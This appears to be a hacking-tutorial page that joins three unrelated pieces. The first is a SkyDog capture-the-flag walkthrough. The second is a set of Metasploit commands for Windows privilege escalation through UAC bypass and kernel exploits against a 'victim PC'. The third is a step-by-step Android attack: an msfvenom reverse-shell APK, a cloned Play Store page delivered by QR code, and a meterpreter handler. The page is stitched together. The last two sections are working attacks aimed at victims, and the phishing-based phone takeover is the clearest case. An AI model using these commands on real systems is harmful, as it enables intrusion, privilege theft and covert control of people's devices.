Hack the SkyDog Con CTF 2016 - Catch Me If You Can VM


SkyDog is the second VM in the CTF series created by James Brower. It is configured with DHCP, so an IP address is assigned to it automatically. The VM is themed on the film Catch Me If You Can, about the con man Frank Abagnale, so it is reasonable to expect a strong OSINT element. It is an enjoyable VM because it exercises both hacking and forensic skills. The author has given hints for all eight flags:

Flag #1 : Don’t go Home Frank! There’s a Hex on Your House
Flag #2 : Obscurity or Security?
Flag #3 : Be Careful Agent, Frank Has Been Known to Intercept Traffic Our Traffic.
Flag #4 : A Good Agent is Hard to Find.
Flag #5 : The Devil is in the Details – Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices
Flag #6 : Where in the World is Frank?
Flag #7 : Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive!
Flag #8 : Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!

Apart from the hints, we know that each flag is stored as an MD5 hash. You can download the VM from: https://www.vulnhub.com/entry/skydog-2016-catch-me-if-you-can,166/.

Penetration Methodology
§  Network scanning (Netdiscover, Nmap)
§  Examine the source code of the web page
§  Extract and decode a hex value for the 1st flag
§  Log in to SSH for the 2nd flag
§  Inspect the HTTPS certificate for the 3rd flag
§  Intercept the browser request and change the user-agent (Burp Suite)
§  Obtain the 4th flag and follow the clue
§  Explore the FBI workstation page and its evidence.txt file
§  Decrypt the 5th flag to obtain credentials
§  Download the image after login
§  Extract the hidden file from inside the image (steghide)
§  Open flag.txt and capture the 6th flag along with a password
§  Log in to SSH and capture the 7th flag
§  Download the zip file via SCP and unzip it
§  Forensic trick: extract file information to capture the 8th flag (Volatility)


WalkThrough

Let us find our target first by running the following command in a Kali terminal:

netdiscover

We can clearly see that our target IP is 192.168.1.100. Now that we have identified the target, let’s scan it with nmap:
nmap -p- -sV 192.168.1.100
The nmap output shows ports 22, 80, 443 and 22222 running SSH (closed), HTTP, HTTPS and SSH (open) respectively. In other words, the SSH service has been moved from its default port 22 to port 22222: port 22 reports closed while 22222 is open. Relocating a service to a non-standard port is a minor obscurity measure meant to throw off attackers, and a full-range scan (-p-) is exactly what defeats it.
Since ports 80 and 443 are open, we can open the IP in a browser.
The home page gives us nothing to go on, so we checked its page source.

In the page source you will find a directory. Let’s open it and see what it has got for us.

The directory didn’t have much to go on either, so we viewed its page source again and there we found a hex value. From the author’s first hint, Flag #1: Don’t go Home Frank! There’s a Hex on Your House, we can tell that this hex value is our first flag. Let’s convert the hex by running the following command in a Kali terminal (substitute the value copied from the page source):
echo "<hex value from page source>" | xxd -p -r
Here,
xxd - creates a hex dump of its input (or reverses one)
-p - selects plain, continuous hex format without offsets or ASCII columns
-r - reverses the operation, converting the hex back into the original bytes

The command decodes the hex into the text shown in the image above, which is itself an MD5 hash. Resolving that MD5 hash gives nmap, so our next hint is nmap and that is where we should look.
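The two-step flag pipeline described above (hex dump to MD5 digest, then MD5 digest to flag word) as an added Python example, not part of the original walkthrough. The sample hex input and the candidate list are constructed here; the real values come from the VM’s page source. Note that MD5 cannot be reversed: “de-hashing” means hashing each candidate word and comparing digests.

```python
import hashlib
from typing import Iterable, Optional

# Constructed sample input: what `xxd -p` style hex of an MD5 digest looks like.
# Built from md5("nmap") so the example runs offline; in the CTF it is copied
# from the page source, not generated.
SAMPLE_HEX = hashlib.md5(b"nmap").hexdigest().encode("ascii").hex()

# Constructed stand-in for a wordlist.
CANDIDATES = ["ssh", "nmap", "encrypt", "personnel", "evidence", "panam"]


def decode_hex(hex_text: str) -> str:
    """Equivalent of `echo <hex> | xxd -p -r`. Whitespace and newlines are
    stripped first because plain hex dumps are usually line-wrapped."""
    clean = "".join(hex_text.split())
    return bytes.fromhex(clean).decode("ascii")


def is_md5_digest(text: str) -> bool:
    """An MD5 digest in hex is exactly 32 hex characters."""
    return len(text) == 32 and all(c in "0123456789abcdef" for c in text.lower())


def lookup_md5(digest: str, candidates: Iterable[str]) -> Optional[str]:
    """Hash every candidate and compare with the digest; None if no match."""
    digest = digest.lower()
    for word in candidates:
        if hashlib.md5(word.encode("utf-8")).hexdigest() == digest:
            return word
    return None


def recover_flag(hex_text: str, candidates: Iterable[str] = CANDIDATES) -> Optional[str]:
    """Full pipeline: hex -> MD5 digest string -> matching flag word."""
    decoded = decode_hex(hex_text)
    if not is_md5_digest(decoded):
        raise ValueError(f"decoded text is not an MD5 digest: {decoded!r}")
    return lookup_md5(decoded, candidates)


if __name__ == "__main__":
    print(recover_flag(SAMPLE_HEX))
```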

As noted in the nmap results, SSH has been moved to a non-default port, so let’s connect to it with the following command:
ssh 192.168.1.100 -p22222

And so we have our next flag; upon de-hashing it turns out to be encrypt.

Our next flag will be somewhere in the encryption used by the website, and the most obvious place encryption appears on a site is its TLS certificate. Let’s check that out.

Click on the highlight area as shown in the above picture. The following dialogue box will open.

Click on the security tab as shown in the above image. And then click on View Certificate button. In the certificate you will find the third flag as shown below:

When converted, our next flag turns out to be personnel.
I had assumed “personnel” was a directory, so let’s open it in a browser.

As shown, the page says “you do not appear to be from an FBI workstation”, which means the server is checking for an FBI workstation somehow. I looked back through every page source we had and found that Internet Explorer 4 is required for the FBI workstation.


Now reload the personnel directory and capture the request with Burp Suite, which will let you change the browser identity.

In Burp Suite, once you have captured the request, change the user-agent from “linux x86_64” to “MSIE 4.0” as shown in the images.

Once you forward the request from Burp Suite, the personnel directory page will load. There you will find your next flag together with a hint: we have to add the prefix ‘new’ to whatever word the hash resolves to.

Upon converting, our flag is evidence. Adding the prefix new, our flag becomes newevidence.

The directory /newevidence takes us to an FBI login portal.

We don’t have a username or password and no clue about them either, so I explored the page source.

In the page source we found two important things, one of which is evidence.txt. When opened, evidence.txt gave us our next flag.

Once converted the flag is panam.
Now let’s open the newevidence file that we found along with the previous flag.

It shows us an image. There must be a steganographically hidden message in the image, so use the following command to extract it:
steghide extract -sf newevidence.jpeg

The hidden file was flag.txt. To read the flag, type:
cat flag.txt
By de-hashing the flag we get ILoveFrance. We also have a clue: iheartbrenda. Both the flag and the clue are important, so make a note of them.


For our seventh flag we have the hint Flag #7 : Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive! The line “I am the fastest man alive” is the introductory dialogue of The Flash, and in the movie Frank uses the fake name Barry Allen, the real name of the Flash.
Therefore, barryallen can be our username. Let’s log in through the SSH port using the barryallen username. When it asked for a password I tried both ILoveFrance and iheartbrenda, and fortunately iheartbrenda was the correct password.


Once we were logged in, we used the following commands to find our flag:
ls - list all the files
cat flag.txt - read the flag
And so we have our next flag. Once de-hashed, the flag was theflash.

Since we have both the username and password for SSH, we can use scp. SCP (the scp command) securely copies files and directories to and from remote hosts without starting an FTP session or logging into the remote system interactively.

scp -P 22222 barryallen@192.168.1.100:/home/barryallen/security-system.data /root/Desktop/file
Once you have the file, unzip it:
unzip file
Now run the following command to complete the CTF challenge; the Volatility notepad plugin lists the text currently displayed in Notepad within the memory image, which contains the door code:
volatility -f security-system.data notepad

YAY! Once again, we have completed a CTF challenge successfully.


7 Ways to Get Admin Access of Remote Windows PC (Bypass Privilege Escalation)

When you exploit a victim PC there are certain limits that prevent you from performing some actions even after you have a shell on it. To get complete access to the victim PC you need privilege escalation, whereby a user obtains privileges they are not authorized for. Such privileges can be used to delete files, view private information, or install unwanted programs such as viruses. Metasploit has various post-exploitation modules that use a number of different techniques to attempt to gain SYSTEM-level privileges on the remote system.

Requirement
Attacker: kali Linux
Victim PC: Windows 7 

Open a Kali Linux terminal and type msfconsole.

Use a payload for Windows and start multi/handler for the reverse connection. Once you have a session on the victim PC, attempt privilege escalation using the following techniques.

Windows Escalate UAC Protection Bypass

Available targets: 32-bit and 64-bit Windows

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off.

msf > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set session 1
msf exploit(bypassuac) > exploit


Look at the image: the getuid command shows the current user, which is username pc10. After running getsystem, getuid shows the user as SYSTEM, meaning you now have admin access.


Windows Escalate UAC Protection Bypass (In Memory Injection)

Available targets: 32-bit and 64-bit Windows

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of the three separate binaries used in the standard technique. However, it requires the correct architecture to be selected (use x64 for SysWOW64 systems as well). If specifying EXE::Custom, your DLL should call ExitProcess() after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_injection
msf exploit(bypassuac_injection) > set session 1
msf exploit(bypassuac_injection) > exploit

Run getsystem, then check the user ID with getuid in meterpreter.


Windows Escalate UAC Protection Bypass (Script Host Vulnerability)

Available targets: 32-bit and 64-bit Windows

This module will bypass Windows UAC by utilizing the missing .manifest on the script host cscript/wscript.exe binaries.

msf > use windows/local/bypassuac_vbs
msf exploit(bypassuac_vbs) > set session 1
msf exploit(bypassuac_vbs) > exploit

Run getsystem, then check the user ID with getuid in meterpreter.


Windows Escalate UAC Execute RunAs

Available targets: 32-bit and 64-bit Windows

This module will attempt to elevate the execution level using the undocumented ShellExecute RunAs flag to bypass low UAC settings. Ask always uses a self-generated payload, which is easily detected by AV. The user must click Yes on the prompt to allow the payload to create another reverse shell with elevated privileges.

msf > use windows/local/ask
msf exploit(ask) > set session 1
msf exploit(ask) > exploit

Run getsystem, then check the user ID with getuid in meterpreter.
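The four UAC bypass modules above depend on the UAC level: at the Windows default, trusted Windows binaries auto-elevate without a prompt, whereas at “Always notify” every elevation prompts on the secure desktop. The following added Python audit script, which is not part of the original article or of Metasploit, reads the three policy values that define that level and reports the weak settings beside the hardened ones; the registry path and value names are the standard Windows ones, and the sample dictionaries are constructed.

```python
import sys
from typing import Dict, List

# HKLM registry key holding the UAC policy values.
UAC_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

# Hardened configuration ("Always notify"): EnableLUA=1,
# ConsentPromptBehaviorAdmin=2 (prompt for every elevation),
# PromptOnSecureDesktop=1 (prompt shown on the secure desktop).
HARDENED = {"EnableLUA": 1, "ConsentPromptBehaviorAdmin": 2, "PromptOnSecureDesktop": 1}

# Constructed sample: the Windows default slider position, where
# ConsentPromptBehaviorAdmin=5 lets trusted Windows binaries auto-elevate.
DEFAULT_LEVEL = {"EnableLUA": 1, "ConsentPromptBehaviorAdmin": 5, "PromptOnSecureDesktop": 1}


def assess_uac(settings: Dict[str, int]) -> List[str]:
    """Return findings for a UAC policy; an empty list means 'Always notify'."""
    findings = []
    if settings.get("EnableLUA", 0) != 1:
        findings.append("EnableLUA=0: UAC is disabled, admin processes start fully elevated")
    cpba = settings.get("ConsentPromptBehaviorAdmin", 5)
    if cpba == 0:
        findings.append("ConsentPromptBehaviorAdmin=0: administrators elevate silently")
    elif cpba != 2:
        findings.append(f"ConsentPromptBehaviorAdmin={cpba}: trusted Windows binaries auto-elevate")
    if settings.get("PromptOnSecureDesktop", 1) != 1:
        findings.append("PromptOnSecureDesktop=0: prompt is drawn on the normal desktop")
    return findings


def read_uac_settings() -> Dict[str, int]:
    """Read the live values on Windows via winreg; raises elsewhere."""
    if sys.platform != "win32":
        raise RuntimeError("live read needs Windows; pass a dict to assess_uac instead")
    import winreg  # Windows-only standard library module
    values: Dict[str, int] = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, UAC_KEY) as key:
        for name in HARDENED:
            try:
                values[name] = int(winreg.QueryValueEx(key, name)[0])
            except FileNotFoundError:
                pass  # absent value falls back to the default in assess_uac
    return values


if __name__ == "__main__":
    live = read_uac_settings() if sys.platform == "win32" else DEFAULT_LEVEL
    print("\n".join(assess_uac(live)) or "UAC is at Always notify")
```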


MS16-032 Secondary Logon Handle Privilege Escalation

Available targets: 32-bit and 64-bit Windows

This module exploits the lack of sanitization of standard handles in the Windows Secondary Logon Service. The vulnerability is known to affect Windows 7 through 10 and Server 2008 through 2012, 32-bit and 64-bit. The module only works against those versions of Windows with PowerShell 2.0 or later and on systems with two or more CPU cores.

msf > use windows/local/ms16_032_secondary_logon_handle_privesc
msf exploit(ms16_032_secondary_logon_handle_privesc) > set session 1
msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit

Run getsystem, then check the user ID with getuid in meterpreter.


MS16-016 mrxdav.sys WebDav Local Privilege Escalation

Available targets: 32-bit Windows

This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process.

msf exploit(ms16_016_webdav) > set session 1
msf exploit(ms16_016_webdav) > exploit

Run getsystem in meterpreter to obtain admin access to the PC.


Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)

Available targets: Windows 7 32-bit

This module leverages a kernel pool overflow in Win32k which allows local privilege escalation. The kernel shellcode nulls the ACL of the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate into winlogon.exe, achieving privilege escalation. This exploit was used in Pwn2Own 2013 by MWR to break out of Chrome’s sandbox. NOTE: when a meterpreter session started by this exploit exits, winlogon.exe is likely to crash.

msf exploit(ms13_053_schlamperei) > set session 1
msf exploit(ms13_053_schlamperei) > exploit

Run getsystem, then check the user ID with getuid in meterpreter.

Hack Android Phone using HTA Attack with QR Code

A QR code is a two-dimensional barcode that can be scanned with a smartphone or a dedicated QR reader. QR codes can link directly to contact numbers, websites, usernames, photos, SMS, e-mails and even encrypted data, and they do not end there. QR codes are a big deal in Japan, and it is only a matter of time before they take over the rest of the world as their use in marketing grows.
By now everyone must have understood that QR codes are the ‘next big thing’, so let’s make them a big thing in regards to hacking. Yes! In this article we are going to hack our victim’s mobile in a few easy steps using a QR code, and all you need for this is your beloved Kali Linux.
Our first step is to create a malicious file using msfvenom:


msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=6666 > /root/Desktop/Launcher.apk


Now open SET. Through SET we will turn the HTA attack into an APK attack to gain access to the victim’s smartphone. From the SET menu select the 2nd option, Website Attack Vectors.


Then further select 8th option which refers to HTA Attack Method.


And then select Site Cloner by typing 2.


When you choose option 2, it will ask you to enter the URL that you want to clone. Here give the URL of the Play Store: https://play.google.com/store


Then when it asks you to select meterpreter option type 3 as we want to select reverse_tcp.


Next, copy the Launcher.apk file that you created with msfvenom to /var/www/html/.


Also rename the Launcher.hta that SET just created to Launcher.apk, as shown below.


Now add the QR Code extension to your Chrome browser.



The QR Code extension will generate a QR code for the attack URL.

Now start multi/handler so that the session is caught in time. For this type:
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.100
set lport 6666
run


Now have the victim scan your code and install the app.


And voila! As soon as the code has been scanned and the app installed, you will have your meterpreter session.